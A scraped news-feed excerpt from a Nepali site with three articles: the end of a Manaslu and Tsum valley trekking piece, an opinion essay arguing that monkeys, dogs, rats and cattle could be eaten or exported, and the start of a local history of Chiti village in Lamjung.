भूभागले अझै पनि पुरानो मनास्लुको पदमार्ग जोगाएको छ । नामरुङ, ल्हो, श्याला, सामागाउँ र साम्दोतिर पुगेपछि भने सडकको प्रभाव निकै कम देखिन्छ ।
मनास्लु पदमार्गको पछिल्लो अवस्था सडक विस्तारले परिवर्तन ल्याएको छ । अहिले जिपहरू माछाखोला– जगत हुँदै पाङसिङ र फिलिम नजिकसम्म पुग्ने गर्दछन । काठमाडौं– आरुघाट– सोतीखोला–माछाखोला नियमित बस सञ्चालनमा छ । पहिले आरुघाट वा सोतीखोलादेखि सुरु हुने पदयात्रा अहिले धेरैले फिलिम वा त्यस वरपरबाट सुरु गर्न थालेका छन । यसले २– ३ दिनको पदयात्रा घटाएको छ । तर   तल्लो भेगको पदमार्गमा सडक निर्माणका कारण धुलो, गाडीको आवाजले पदयात्राको मौलिक अनुभव प्रभावित भएको छ । निर्माणाधिन बुढीगण्डकी करिडोरको बेनीघाट– आरुघाट– लार्केभञ्ज्याङ सडकका दूरी करिब १५४ कि.मि. रहेको छ । लार्केभञ्ज्याङ– रुइला सीमा करिब ८–१० कि.मि.रहेको छ । तर अहिले पनि माथिल्लो भेग फिलिम–साम्दो–लार्के सडक खण्ड निर्माण को चरणमा छ ।
चुम उपत्यका पुग्ने पर्यटकहरू हिमाल मात्र हेरेर फर्किँदैनन । पर्यटकहरूले पृथक सभ्यता, जीवनदर्शन र हिमाली संस्कृतिसँग साक्षात्कार गरेर फर्कन्छन । चुम उपत्यकामा पाइला टेक्नासाथ गणेश हिमाल, हिमचुली, बौद्ध हिमाल र तिब्बती हिमश्रृंखलाका मनोरम दृश्यले पर्यटकलाई मन्त्रमुग्ध बनाउँछ । हिउँले ढाकिएका शिखरहरू, नीलो आकाश र हरिया घाँसे मैदान र मानवबस्तीमा चर्न आउने जंगली जनावरले पर्यटकहरूलाई नयाँ अनुभव हुन्छ । चुममा पर्यटकहरुले जीवित तिब्बती बौद्ध संस्कृति, मानिसहरूको भाषा, भेषभूषा, घर निर्माणको शैली, धार्मिक परम्परा र दैनिक जीवनमा तिब्बती बौद्ध संस्कृतिको गहिरो प्रभाव देख्दछन । जुन कारणले पर्यटकहरुलाई चुम क्षेत्र खुल्ला सांस्कृतिक संग्रहालयजस्तै लाग्छ । तिब्बती बौद्ध धर्मका महान योगी मिलारेपा सँग सम्बन्धित गुफा चुम उपत्यकाको अर्को आकर्षण हो । चुम उपत्यकामा पुग्दा पर्यटकहरूले ऐतिहासिक स्थल मात्र होइन, तपस्या, ध्यान र आत्मिक साधनाको कथा पनि अनुभव गर्छन । चुम उपत्यका अहिंसा र करुणाको बौद्ध दर्शनबाट प्रभावित क्षेत्र हो । यहाँको सामाजिक सदभाव, सरल जीवनशैली र आपसी विश्वासले बाहिरी संसारको व्यस्त जीवनबाट आएका पर्यटकलाई आश्चर्य लाग्दछ ।
पर्यटकहरूलाई जानकारी दिन पदमार्गमा सूचना बोर्ड राखिएको छ । यामगाउँ, काशीगाउँ, धार्चे डाँडा, माछाखोला र यारुबगरमा राखिएका बोर्डले पर्यटकीय स्थलको उचाइ, गन्तव्य पुग्न लाग्ने समय, एक ठाउँदेखि अर्को ठाउँसम्मको दूरीलगायत जानकारी दिन्छन । बोर्डमा पदमार्गमा पर्ने खोलानाला, ताल, पुलका साथै ती क्षेत्रमा पाइने वन्यजन्तुबारे पनि जानकारी दिइएको छ । हिमालय क्षेत्रको पदयात्राका क्षणहरु अविस्मरणीय हुन्छन । नयाँ ठाउँमा यात्रा गर्न जति रमाइलो र मनोरम हुन्छ, त्यति नै कठिन पनि हुन्छ । यात्रालाई सहज बनाउन पर्यटकले आफ्नो स्वास्थ्य स्थितिको ख्याल राख्नुपर्छ । गन्तव्यबारे पूर्वजानकारी लिएर मात्र यात्रामा निस्कदा राम्रो हुन्छ । वातावरण तथा मौसम सुहाउँदो लुगा, अत्यावश्यक सामग्री र प्राथमिक उपचारका सामग्रीहरू साथमै राख्नुपर्छ । मोबाइल फोन लिँदा यात्रामा सजिलो हुन्छ । सकेसम्म यस्तो पदयात्रामा एक्लै नगई साथी वा गाइडको साथमा जानुपर्छ ।
कसरी पुग्ने चुम उपत्यका ?
चुमनुब्री उपत्यका गोरखाको आरुघाट र मनाङको धारापानी हुँदै लार्के पास गरेर पनि जान सकिन्छ । मनास्लु क्षेत्र अर्थात चुमनुब्रीमा जाने मुख्य बाटो गोरखाको आरुघाट बजार हो । आरुघाट जान पृथ्वीराजमार्गको बेनीघाटबाट बसमा यात्रा गर्न सकिन्छ । आरुघाट धादिङबेसीबाट समेत मोटरमार्गले जोडिएको छ । पोखराबाट मध्यपहाडी लोकमार्ग हुँदै आउने पर्यटकका लागि पनि सडकले आरुघाट जोडछ । आरुघाटदेखि सोतीखोला, लापुवेसी, माछाखोला हुँदै यात्रा गर्नुपर्छ । अर्को रुट बारपाकबाट लाप्राक हुँदै सिंग्ला निस्किएर माछाखोला पुग्ने पदमार्ग पनि छ । धादिङको फूलखर्क हुँदै गोरखाको केरौंजा, यार्साबाट माछाखोला पुग्ने पदमार्ग पनि पर्यटकले प्रयोग गर्न सक्छन ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=49649 0
बाँदर र कुकुरको आतंक र गाई गोरुको सम्बन्ध https://www.antaranganews.com/?p=49568 https://www.antaranganews.com/?p=49568#respond Mon, 22 Jun 2026 08:53:58 +0000 https://www.antaranganews.com/?p=49568 यो सत्य घटना हो कि ! नेपालीहरू प्रायः अफ्रिकाको कुनै देशमा गएका रहेछन् । बिहानको खाजामा चाउचाउ दिएका रहेछन् । त्यो चाउचाउ यति मिठो लागेछ कि नेपालीहरूले थपी थपी खाएछन् । उनीहरूले आयोजकलाई यति मिठो चाउचाउ अहिलेसम्म नखाएकोले त्यो प्रविधि देखाउन अनुरोध गरेछन् । बिहान करिव ८ बजे चाउचाउ खाएकोमा दिनको करिव १ बजे नेपालीहरूलाई चाउचाउ उत्पादन हुने स्थानमा लग्ने भनिएछ । उनीहरूले नेपालीहरूलाई गडेउलाको उत्पादन हुने फार्ममा लगेछन् । नेपालीहरूले चाउचाउको उत्पादन हुने ठाउंँमा लग्ने भनेको कता ल्याउनु भयो भन्दा उनीहरूले यी गड्यौला नै मारेर सुकाएर, बफाउने आदि गरेर चाउचाउ जस्तो वस्तु तयार हुन्छ र यो ज्यादै स्वास्थकर पनि हुन्छ । हामीहरू यसलाई उच्चस्तरको खानामा यो परिकारको रुपमा लिन्छौ । त्यो बिहानको खाजा पनि यसैबाट बनेको हो भनेछन् । नेपालीहरूलाई घिन लागेर बमिट हुन थालेछ । यति ज्यादा बमिट भएछ कि ¤ उनीहरू मध्ये केहीलाई स्लाइन पानी नै चढाउन पर्ने भएछ । केही ठीक भएपछि नेपालीहरूले केही रिसाएर यस्तो फोहोर वस्तु पनि खुवाउने हो ? भनेर सोद्धा हामीहरूको राम्रो खाना हो कसरी फोहोर हुन्छ भनेर प्रतिपश्न गरेछन् । गंडेउला पनि सफा हुन्छ त ? भन्दा उनीहरूले फार्ममा पालेको गड्यौलाले सागपातहरू त खान्छ अरु के खान्छ र ¤ यो त साह्रै सफा छ भनेछन् । नेपालीहरूले जे भए पनि गड्यौला खानु त साह्रै फोहोर हो भनेछन् ।
ती मध्ये एक जना अफ्रिकन नेपाल पनि आएका रहेछन् । उनले सिधा नै तपाईहरू दिसा, सिंगान, कुहेको वस्तु खाने कुखुरा त साह्रै मिठो मानेर खानु हुन्छ । मानिसको दिसा खाने सुंगुरमा पनि कालो सुंगुर मिठो भन्दै खानु हुन्छ । ती भन्दा गड्यौला त कति सफा हुन्छ भन्ने तुलना नै छैन, अझै यी गड्यौला त राम्रो वस्तु मात्र खुवाएर कुनै पनि खराबी नहुने गरेर पालेको हो भनेछन् । नेपालीहरूसंग जवाफ थिएन र उनी अवाक भएछन् । तर अझै गड्यौलाको खाना चाउचाउ भनेर खाएको यादमा थुक्दै रहेछन् ।
कुनै परिवेशमा केही कुराको विकास हुन्छ, परिवेश बदलिएमा पनि बानी बदलिंदैन र बानी परिवेश सापेक्ष नभएकोले दुःख हुन्छ । बास्तवमा हामीले निष्पक्ष भएर तुलना गर्दा पनि ती गड्यौला भन्दा सुंगुर, कुखुरा तथा कुकुरले त धेरै फोहोर वस्तु खान्छन् । परम्पराले गर्दा जन्मे पछिको बानीको पनि दास भएपछि केही लाग्दैन । मानिस त्यही गलत कुराको कुतर्क समेत दिएर पृष्टपोषण गर्न थाल्छ । जो बानीमा रमाउंछ, बास्तवमा उसले सनातन धर्मको मर्मलाई अझै राम्रोसंग बुझेको हुंदैन । यद्यपि उ सनातनका मुख्य सैद्धान्तिक धारको पक्षमा नै रहन्छ । सनातन धर्म निर्मित भन्दा विकसित हो । अब्राहमिक धर्महरू जस्तो यो निश्चित समयमा निर्मित होइन । यस सनातन धर्मको मर्म र माहानता यसरी बुझ्न सक्नु पर्छ । त्यसैले गीतामा भगवान कृष्ण भन्नु हुन्छ कि ¤ ‘जव जव धर्म रक्षाको लागि आफू आउन पर्ने अवस्था हुन्छ, म आउंछु ।’ यो भनेको समय सापेक्ष सन्देश दिन र व्यवहार गरेर देखाउन आउंछु भनेको हो ।
कुनै समयमा कथाहरूमा महादेवको बाहान भनिएको मुसालाई हामीहरूले खादैनौं । तर मुसा भन्दा राम्रो खाना हामीहरूले पनि नखाएका पनि सक्छौं । हामीहरूको संस्कृतिमा मुसा खाने बानी बसाल्ने हो भने मुसाले दुःख दिन छोड्छ र राम्रो मासु पनि प्राप्त हुन्छ । हामी हिन्दु मध्येकै कतिपय समुदायहरूले मुसाको मासु खाने गरेका पनि छौं । खानेहरू स्वस्थ्य नै हुन्छन् । बांदर त हामीहरूका लागि हनुमानको अनुहारसंग मिल्ने नै भए । बांदरको मासु पनि दक्षिणी चीन र कोरियामामा खाने गरिन्छ, त्यतिमात्र नभइ नेपालमा समेत कुसुण्डा जाति समेतले बांदरको मासु खान्छन् । बांदरको मासु पनि अस्वस्थकर हुंदैन भन्ने त विकशित देशमा समेत बांदरको मासु खाने र नेपालमा पनि बांदरको मासु खानेहरू मासुको कारणले बिरामी नभएकोले पनि देखिएको छ । कुकुर पनि माथि उल्लेखित देशका कुनै क्षेत्रहरूमा खाइन्छन् भन्ने जानकारी पाइने गरेको छ । यसरी मुसा, कुकुर र बांदर स्वास्थ्यको लागि हानिकारक होइनन् भन्ने प्रष्ट छ । हामीले पशुहरू मध्ये स्वास्थलाई असर नगर्नेलाई मासुमा प्रयोग गर्न तयार हुन आवश्यक छ । त्यसो हुंदा बांदर, कुकुर तथा मुसाबाट हुने नोक्सानबाट बच्न सकिन्छ । सस्तोमा स्वास्थकर खाना पनि पाउन सकिन्छ भन्ने तर्क पेश गरेमा त्यो तर्कमा कति विरोध आउला ? बेचेर पनि त पैसा कमाउन सकिन्छ ।
यो पक्षमा नेपालमा प्रयोग गर्न विरोध नै हुन्छ भने पनि ती जनावरहरूलाई विदेशमा जहांँ खाइन्छ त्यहांँ पठाउन सक्नु पर्छ । त्यसबाट हामीहरूको समस्या समाधान हुन्छ । रोजगारी र आम्दानी मात्र हुंदैन बरु विदेशी मुद्रा पनि प्राप्त हुन्छ भन्नेहरूको भनाइलाई पनि ध्यान दिन सकिन्छ । यी जनावारहरूको आतंकको पनि अन्त्य हुन्छ । के यो पक्षलाई राष्ट्रिय छलफलको बिषय बनाउन सकिएला ?
यस सम्बन्धमा देशले सम्बन्धित निकायबाट आवश्यक परे अनुमति पनि लिन सक्छ । गाई गोरुको सम्वन्धमा पनि साह्रै पिडादायक अनुभवहरू छन् । टेक्टरको प्रचलनले गर्दा गोरुको आवश्यकता धेरै नै कम भएको छ । जुरो नहुने बाच्छाहरूबाट त खेत जोत्न पनि कठिन हुन्छ । गाईले बाच्छाहरू पाएमा दुध नदिएर वा धेरै दुध दिएर तथा अन्य तरिकाले मार्ने गरेका उदाहरणहरू बारंवार सुनिने गर्छन् । बांँचेका ती बाच्छालाई मानिसहरूले छोड्ने गरेको कारण बाच्छाहरूले बाली खाइदिने गर्दा धेरैलाई ठूलो हानी भएको देखिन्छ । सडक दुर्घटना हुने र सडकमा किचिएर बाच्छाहरू मर्ने गरेका छन् । कतिपय जनसमुदायले बाच्छाको मासु खाने गरेकोले तिनीहरूलाई लगेर गोप्य रुपमा काटेर खाने गर्छन भन्ने पनि गरिन्छ । दुध नदिने बुढा गाईहरू तथा जोत्नमा प्रयोग नहुने गोरुहरू कसैको घरमा हुंदैनन् । ती कहां गए त ? सत्य बुझौं र व्यवहार गरौं । त्यसैले हामीहरू ज्यादा अव्यवहारिक पनि बन्नु हुंदैन । हामीहरू मध्ये मासु नखानेहरूले पनि कुखुरा तथा बाख्रा पाल्ने गरेका पनि त छौं ।
भारतमा हिन्दुहरूले गाई गोरुहरू आफूले नखाने भए पनि मसुल्मानहरूलाई बेच्ने गरेको र त्यो रकमबाट परिवारको उचित कार्यमा सहयोग पुगेको पनि सुनिने गरेको छ । गाई गोरु हिन्दु अर्थात सनातनीहरूले खांदै खांदैनन् भन्ने पनि होइन । अर्कोतर्पm लक्ष्मी गाईको रुपमा कुनै समयमा अवतार लिएको भन्ने पनि छ । सायद त्यही कारणले गाई पशु हुंदाहुंदै पनि गाईलाई आमाको रुपमा मानिएको हुन पर्छ । यद्यपि गाईको दुध, घिउ, गउत सबै स्वास्थ्यको लागि ज्यादा राम्रो रहेको, छाला र गोवर समेत अरु भन्दा उपयुक्त रहेको तर्क दिने गरिएको छ । मलभुत रुपमा गाईलाई चेतना ज्यादा भएको, ज्यादा उपयोगी रहेको तथा यसका बाच्छाहरू जोत्न र सम्म स्थानमा भारी बोक्न प्रयोग हुने गरेकोले गाईको सम्मान गरिएको हो । गाईको उयोगिता अहिले पनि अरु पशुको भन्दा उच्च छ तर टेक्टर समेतले गर्दा पहिलाको जस्तो उपयोगिता भने छैन । यो तथ्य महत्वपूर्ण हो ।
भगवानको अवतार त सनातन धर्म अनुसार माछो, कछुवा, सुंगुर आदिमा पनि भएको हो भन्ने मान्यता छ । भगवान शिव पार्वती मृगको रुपमा रहेका पनि कथाहरू छन् । यी जनावरहरू हामी खान्छौं । कुनै समयमा भगवानको कुनै जनावरमा अवतरण हुनु त्यो जनावर संधै जनावर नभई भगवान सरह नै हो भन्नु सनातन धर्मको मुल मर्म समय सापेक्ष परिवर्तन भन्ने मान्यताबाट अलग हुनु पनि हो । हामीले गाई गोरुहरू तथा बाच्छाहरू किन्नेलाई बेचेर आर्थिक फाइदा लिनु कुनै पनि हालतमा नराम्रो होइन । हामीहरूको परंपराले उचित नठह¥याकोले हामीले नखाए भइ हाल्यो । वेद र गीतमा पनि ‘ज्ञानीका दृष्टिमा सबै समान छन्’ भनिएको छ र मानिस अनन्त ज्ञान भएको तथा धेरै चेतना भएको स्वजातीय भएको तथा मुक्तिको लागि आफैले प्रयास गर्न सक्ने भएकोले यसको सुरक्षा प्रमुख हो । यद्यपि सायद यो पंतिकार साकाहारी भएकोले माछ मासु जस्ता खाना भन्दा साकाहारी खाना उपयुक्त हुन् भन्ने विश्वास गर्छ । तर यो आफ्नो विश्वासको मात्र विषय होइन । हामीले सामान्यत विवेक लगाउंदा के गर्दा ठीक हुन्छ जस्तो लाग्छ त्यो गर्ने हो ।
संसारका सबै पशु अर्थात जनावारहरू उपयोगिता र आवश्यकताको आधारमा संरक्षण हुन पर्छ । समग्रमा सबै प्राणीहरूका जातिहरू रहिरहनु पर्छ । यो प्राणी प्रणालीको नियम हो । तर औचित्यको आधारमा के काममा प्रयोग गर्ने ? हामीहरूले नमारे पनि मर्ने जिवलाई कम दुःख अर्थात सकेसम्म छोटो समय पीडा दिएर मारिन्छ र त्यसले आर्थिक फाइदा हुन्छ भने त्यसमा धर्म बीचमा आउंदैन र आउंनु हुंदैन । सबै वस्तुमा परमात्माको भाव छ । पशु, वनस्पती, निर्जीव वस्तु, हामी मानव सबैमा परमात्माको भाव भएकोले केही पनि प्रयोग नगर्ने त ? त्यसो होइन, परमात्माको प्रणालीले ती वस्तुहरू उचितको आधारमा न्युनतम भोग गर्ने सन्देश दिन्छ । हामीले सबै प्रयोग गर्ने हो, केवल औचित्य र विवेकको आधारमा प्रयोग गर्ने हो ।
सायद उल्लेखित कार्य गर्ने हो भने न बांदर, मुसा या कुकुरले दुःख दिन्छ न अन्य अप्ठेरो नै हुन्छ । कुनै पनि जीवको उचित प्रयोगले आम्दानी राम्रो हुन्छ । समस्या समाधान हुन्छ । हामी ती सबै प्राणी खानेहरू भन्दा उच्चतम, उन्नत समेत छौं भन्ने कुनै विषेश प्रमाण छ र ? बरु ती पशुहरू खानेहरू हामीहरू भन्दा विकसित र सभ्य छन् । हामीहरूले कतिपय खान नराम्रो लाग्ने कुरा नखाउं तर खानेहरूलाई दिंदा हामीहरूलाई फरक पर्दैन । तिनीहरूलाई बेचेर तथा यहां ती वस्तुले नराम्रो गर्न नपाएर समेत आर्थिक फाइदा हुन्छ । सिधै गाइ गोरु नखानु भन्ने होइन, लग्छन् भने बेचौं तर भनौं कि गाईका यी फाइदा छन्, स्वास्थ्यको लागि यो जनावर उपयुक्त छ । त्यसैले यसको संरक्षण गरौं । यसबाट हामीलाई फाइदा छ र यो बैज्ञानिक छ भन्ने सन्देश दिन हामी सक्षम हुनै पर्छ । कुनै समुदायको चाहनालाई बलले रोक्नु उपचार होइन । जुन भनाइ बैज्ञानिक र विवेकसंगत छैन, त्यसको पछि नलागौं । हामी सनातनी भनेका समय सापेक्ष, विज्ञान सापेक्ष र विवेकशील हांै र सनातन भनैकै यही हो ।
(लेखक : वरिष्ठ अधिवक्ता हुनुका साथै लमजुङको जेठो पत्रिका अन्तरङ्गको अतिथि सम्पादक हुनुहुन्छ । यो लेख सोही साप्ताहिकबाट साभार गरिएको हो । – सं.)

]]>
https://www.antaranganews.com/?feed=rss2&p=49568 0
लमजुङको चिति गाउँको इतिहास र शिक्षाको विकास https://www.antaranganews.com/?p=49167 https://www.antaranganews.com/?p=49167#respond Thu, 04 Jun 2026 03:06:36 +0000 https://www.antaranganews.com/?p=49167 मानव सभ्यताको विकास क्रमदेखि नै मानव इतिहासको पनि सुरुवात भएको छ । वास्तवमा शिलालेख इतिहासका स्रोतहरू हुन । यसबाहेक ताम्रापत्र, वंशावली र मानिसले मनाउँदै आएका चाडपर्व आदि इत्यादि सबै इतिहाससँग जोडिने विषयहरू हुन । इतिहास लेख्न तथ्य र प्रमाण चाहिन्छ । बिना तथ्य इतिहास बन्दैन । इतिहास बितेका सत्यतथ्य घटनाहरूको यथार्थ विवरण हो । त्यसैले इतिहास निरन्तर खोज र अनुसन्धानको विषय हो । सबै इतिहास दृश्यमान हुँदैन । इतिहासका कतिपय पाटा अदृश्य छन । लमजुङको चिति गाउँको धेरै इतिहास लुकेको छ । यसलाई सजिलै पहिचान गर्न सकिन्न ।
मानिसले आफ्ना पुर्खाको इतिहासलाई विशेष रुचिले खोज्ने र अध्ययन गर्न खोज्दछन । किनभने इतिहास वर्तमान र भविष्यको आधार हो । विविध जाति र समुदाय रहेको चिती गाउँमा पनि यो क्रम जारी छ । विगतमा आफ्ना पुर्खा कहाँबाट चितिमा आए ? कसरी गाउँमा बस्तीको विकास भयो ? शिक्षाको सुरुवात कसरी भयो ? आदि कुराको इतिहास चितिका बासिन्दाहरूले जान्न खोज्दछन ।  आफ्नो गाउँको इतिहासका कुरा अहिलेको पुस्ताका लागि रोचक हुने गर्दछ । इतिहासको अध्ययन र अनुसन्धानले कुनै समुदाय विशेषले विगतमा गरेको योगदान र तिनको अन्य समुदायसँगको अन्तर्सम्बन्ध थाहा पाउन मद्दत गर्दछ । यस्तो विषयको लेखनमा ऐतिहासिक स्रोत सामग्री आवश्यक हुन्छ, । तर चितीमा इतिहासलाई आवश्यक पर्ने तथ्य र प्रमाण अर्थात शिलालेख भेटिदैन । केही वंशाबली र लोक कथाको आधारमा चितिको इतिहासका कुराहरू खोज्नु पर्ने हुन्छ ।
जन्मभूमिको इतिहास जान्नु किन आवश्यक छ ? यसको उत्तर केवल भावनामा मात्रै होइन, ज्ञान, पहिचान र भविष्यको दिशासम्म गहिरोसँग जोडिएको हुन्छ । इतिहासमा धेरै कुरा लुकेको हुन्छ । इतिहास जान्नु भनेको पहिचान बुझ्नु हो । गाउँको नाम र मन्दिरदेखि जातजाति, संस्कार सस्कृति  कसरी बने, किन बने ? यी प्रश्नहरूको उत्तर इतिहासमै भेटिन्छ । इतिहास थाहा पाउँदा व्यक्तिले आफ्नो पहिचानबारे स्पष्ट हुन्छ र गर्व गर्दछ । पुराना लोककथा, संस्कार र परम्परामा लुकेका ज्ञान गाउँको नाम कसरी रह्यो ? कुन वंश कहाँबाट आएर बसोबास गरेका हुन ? गाउँमा चाडपर्व किन मनाइन्छ ? गाउँका पुराना मन्दिर, थान वा पाटी–पौवा चौतारो उकालो ओरालाका ढुङ्गाका सिढीमार्ग कस्ले बनायो ? यी कुराको थाहा नहुँदा नयाँ पुस्ताले संस्कारलाई केवल पुरानाको बोझ ठान्न थाल्छन । इतिहास जानेन भने आफ्ना पुर्खाको मेहनत, संघर्ष र बलिदानलाई नचिन्नु हो । आजका युवाले इतिहास नबुझेकै कारण गाउँमा पुर्खाले निर्माण गरेका पोखरी, पाटी र पुर्खाले हिडेका बाटो हराउँदै गएका छन ।
इतिहासले वर्तमानलाई बुझन र भविष्य सोच्न सहयोग गर्दछ । सुनेको कुरा र वास्तविक तथ्य बीच ठूलो अन्तर हुन सक्छ । इतिहास लेखनले गलत व्याख्यालाई सच्याउँछ मिथक र यथार्थ छुटयाउँछ । वास्तविक प्रमाणसहित गाउँको कथा उजागर गर्छ । इतिहास नजान्दा गाउँ बिर्सिन थाल्छ । इतिहास लेखिएन भने गाउँका नामसँगै परम्परा, भाषा, बोली, जीवनपद्धति, भूमि–स्मरण सबै हराउन सक्छ ।  आजभोलि धेरै पढे–लेखेका मानिसहरूले पनि आफू जन्मेको गाउँको इतिहासप्रति चासो नदेखाउने क्रम बढ्दो छ । तर आफ्नै जमिन, आफ्नै पानी, आफ्नै संस्कारको इतिहास नजान्नु केवल जानकारीको कमी मात्र होइन पहिचान, परम्परा र सामुहिक चेतनाबाट टाढिनु पनि हो । पहिलो कुरा, इतिहास नजानेपछि मान्छे आफैं अपूरो बन्छ । गाउँको विगतसँग सम्बन्ध टुटेपछि म को हुँ ? भन्ने उत्तर पनि कमजोर बन्छ । इतिहास नजान्दा संस्कार कमजोर पर्छन । गाउँको इतिहास नयाँ पुस्ताका लागि पहिचान, प्रेरणा र दिशा दिने एउटा जीवित कक्षा जस्तै हो । गाउँ कहाँबाट उठेको हो, कसले बसाले, कुन परम्परा र संस्कार कसरी विकसित भए ? यी कुरा जान्दा नयाँ पुस्तामा आफ्नो ठाउँप्रति गर्व र पहिचानको भावना बलियो बन्छ । गाउँका पुराना चाडपर्व, गीत, नाच, जात्रा, मौखिक कथा, देवी–देवता र पुराना रीति–नीति इतिहासमार्फत नयाँ पुस्ताले जान्न सक्छन । गाउँको इतिहास भनेको नयाँ पुस्ताका लागि पहिचान, संस्कृति, ज्ञान र भविष्य निर्देशन दिने जीवन्त दस्तावेज हो ।
चिति गाउँको भूगोल इतिहास, संस्कृति, जातीय विविधता र प्राकृतिक सुन्दरताले भरिएको छ । अहिले चिति बेसीशहर नगरपालिका– ११ भए पनि बिगतमा अर्थात चिति मौजा थियो । २०१७ पछि  चिति तिलाहर र आमडाँडा पञ्चायत हुदै चिति गाविस पनि भएको थियो । चिति गाउँमा इतिहास नलेखिएका कुरा धेरै छन । चिति गाउँमा लोक कथामा रहेको कतिपय कुराहरू सुनाउने जेष्ट नागरिकहरूको पनि कमि हँुदै गएको छ । चितिको केही इतिहास जान्नको लागि लमजुङको शाहवंशीय राजाहरूको शासन कालमा पुग्नु पर्दछ । कालु शाहलाई तत्कालीन घले राजाका सेनाले हत्या गरिदिए पछि लमजुङमा यशोबह्म शाहलाई राजा बनाएका थिए । लमजुङमा यशोब्रह्म शाहदेखि क्रमशः नरहरि शाह, चूडा शाह, अचिन्द्र शाह, नरेन्द्र शाह, केहरीनारायण शाह, भीम शाह, रिपुमर्दन शाह र बीरमर्दन शाह समेत गरी वि.सं.१५५० देखि १८३९ सम्म ३०० वर्ष राज्य गरेका थिए । लमजुङका आठौं पुस्ताका राजा रिपुमर्दन शाहले राज्य सञ्चालन गर्दा लमजुङलाई २७ मौजा अर्थात भाग वा थुममा विभाजन गरेका थिए । जस मध्येको चिति, मञ्ज्याङ, शेरा, धिमिरे नौथर, वाह्रथर आदि मिलेर एक मौजा बनेको थियो ।
त्यो बेलामा रजस्थल, राजा बस्ने ठाउँ राजधानी वा गौंडा निर्माण गरेको ठाउँ । सराञ्चोक, राजाका सिपाहीले सरायँ अर्थात युद्धकलाको नाच खेल्ने ठाउँ । चौथर, गौंडाकोट भनी राज्यले सैनिक राख्ने ठाउँ । नौथर, बाह्रथर, लमजुङको फौज बस्ने र तालिम गर्ने ठाउँ भनेर तोकिएको थियो भने चितिलाई राजाको चिताईदारहरूलाई बसोबास गर्न खटाइएको ठाउँ भन्ने थियो । चिति शब्द भागवत महापुराण र सप्तचण्डीमा समेत भेटिन्छ । चितिलाई चेतना भएको मानिसहरूको बसोवास गर्ने ठाउँ पनि भन्ने गरिन्छ । चिति शब्द चेतना ंईति मिलेर चिति शब्द बनेको हो । जसको अर्थ चेतनायुक्त मानिस बस्ने भएको हुनाले चिति नामाकरण भएको अर्थात शिक्षित मानिस बसेको ठाउँलाई चिति भनिएको हो । लमजुङका राजाका जग्गा जमिन घर दरवार पाटी पौवा आदीको रेखदेख चिताई बन्दोबस्त गर्ने व्यक्तिलाई बसोबास गर्न दिएको ठाँउलाई चिति नामाकरण गरिएको भन्ने सन्दर्भ पनि रहेको छ । चिति क्षेत्र भित्र स्याउत, तिलाहार, पण्डितथोक, तिवारीडाँडा, बिष्टथर, तीनपिप्ले, रामचोक र रामचोकबेसी, कार्कीडाँडा, डाँडाथोक, बरवोटबेसी आदि ठाँउ पर्दछन ।
शाहवंशको शासनकालमा चितिका तिवारी, पन्त, विष्ट, पाण्डे, जोशी र रेग्मीहरूको भूमिका महत्वपूर्ण रहेको थियो । चितिका ज्ञाननिधी तिवारीले राजासँग मित लगाई महिनाको एक दिन शासन गरेको, विष्टहरूले राजाका सेनालाई ६ महिनालाई पुग्ने धान दिने कबुल गरेको, स्याउतका पन्तहरूलाई विर्ता दिएको, रामशाली र ताराशाली पन्तको तान्त्रिक शक्ति आदि लोककथा पनि चितिमा पाइन्छ । सेरा फाँटमा मनाङेहरू जाडो छल्न आएर बस्ने र कुमालेहरू माटाका भाडा बनाएर व्यापार गर्न आउने कुरा, दलालमा ठूली एकादशीको दिन लाग्ने मेला अहिले कथा जस्तै भएको छ । चिति गाउँमा रहेका पानी पधेरा, चौतारा र उकाली–ओरालीका ढुंगाका सिँढी मार्गहरूको लिखित इतिहास भेटिदैन । गाउँमा रहेका ती सबै सम्पदा पुर्खाहरूको सामूहिक श्रम र सामाजिक सदभावका प्रतीक मानिन्छन । चिति गाउँको इतिहासमा कुनै शिलालेख वा सरकारी अभिलेख नपाइए पनि गाउँमा रहँदै आएको लोक कथाअनुसार यी संरचनाहरू गाउँ जोड्ने, यात्रुहरूलाई आश्रय दिने र दैनिक जीवनलाई सहज बनाउने उद्देश्यले निर्माण भएका थिए ।
चिति तिलहारमा चाँपको रुख पनि थियो । चाँपको रुख भएका कारण तिलाहरलाई चाँपाबोट भन्ने गरेका थिए । पछि तिलाहरको नामले प्रख्यात भयो । तिलाहर शब्द गुरुङ भाषाबाट आएको हो । तिलाहारको भाषिक व्युत्पत्ति गुरुङ भाषामा ‘तिला भन्नाले सँुगुर हुन्छ । तिलाहरलाई गुरुङ भाषामा सुँगुरको बथान अर्थात हुल भन्ने गरिन्छ । तिला भनेको सुँगुर र हार भनेको लाम हो । शिलालेख त छैन तर जनश्रुती अनुसार चिति तिलाहारको अहिलेको ठाउँमा परापूर्वमा चेपाङहरूको बस्ती थियो । चेपाङ जातीले सुँगुर पाल्ने र त्यो समयमा सुगुरलाई छाडा छोड्ने चलनले गुरुङहरूले डाँडाबाट हेर्दा सुँगुरको लाइन देखेको हुदा तिलाहार भन्ने गरेको हो । स्याउत र चितिको अन्य गाउँमा बस्ती विकास हुन लागेपछि चेपाङ जातिहरू तिलाहारबाट बिस्थापित भएको कथा पनि छ । यो खोजको बिषय बन्ला । त्यसपछि चितिमा पन्त, कमली, तिवारी र बिष्टहरूको बसोवास हुन थाल्यो । चितिमा पन्तहरू पाचँ किसिमका छन । बिष्ट थरका पन्त र रामचोकका पन्तहरू गोरखाको गाईखुरबाट आएका हुन । उनीहरूलाई बिष्टहरूले ल्याएका थिए । रामचोकका पन्तहरू चितिमा आएका अहिले सात पुस्ता भएको छ । ती पन्त भारद्वाज गोत्रका हुन । बिष्ट थरका र रामचोकका पन्तहरू कुमाउगढबाट बैतडी हुँदै पाल्पा र गोरखा पछि चिति गएका हुन । पण्डीत थोकका पन्तहरू सुरुमा कार्कीडाँडाबाट पण्डीतथोकमा आएका हुन । उनीहरू पण्डीतथोकमा आएर बसोवास गर्न थालेका कति पुस्ता भयो ? त्यो थाहा नभए पनि परमानन्दका छोरा नित्यानन्द पन्त आएका थिए भन्ने पन्तहरूले भन्ने गर्दछन ।
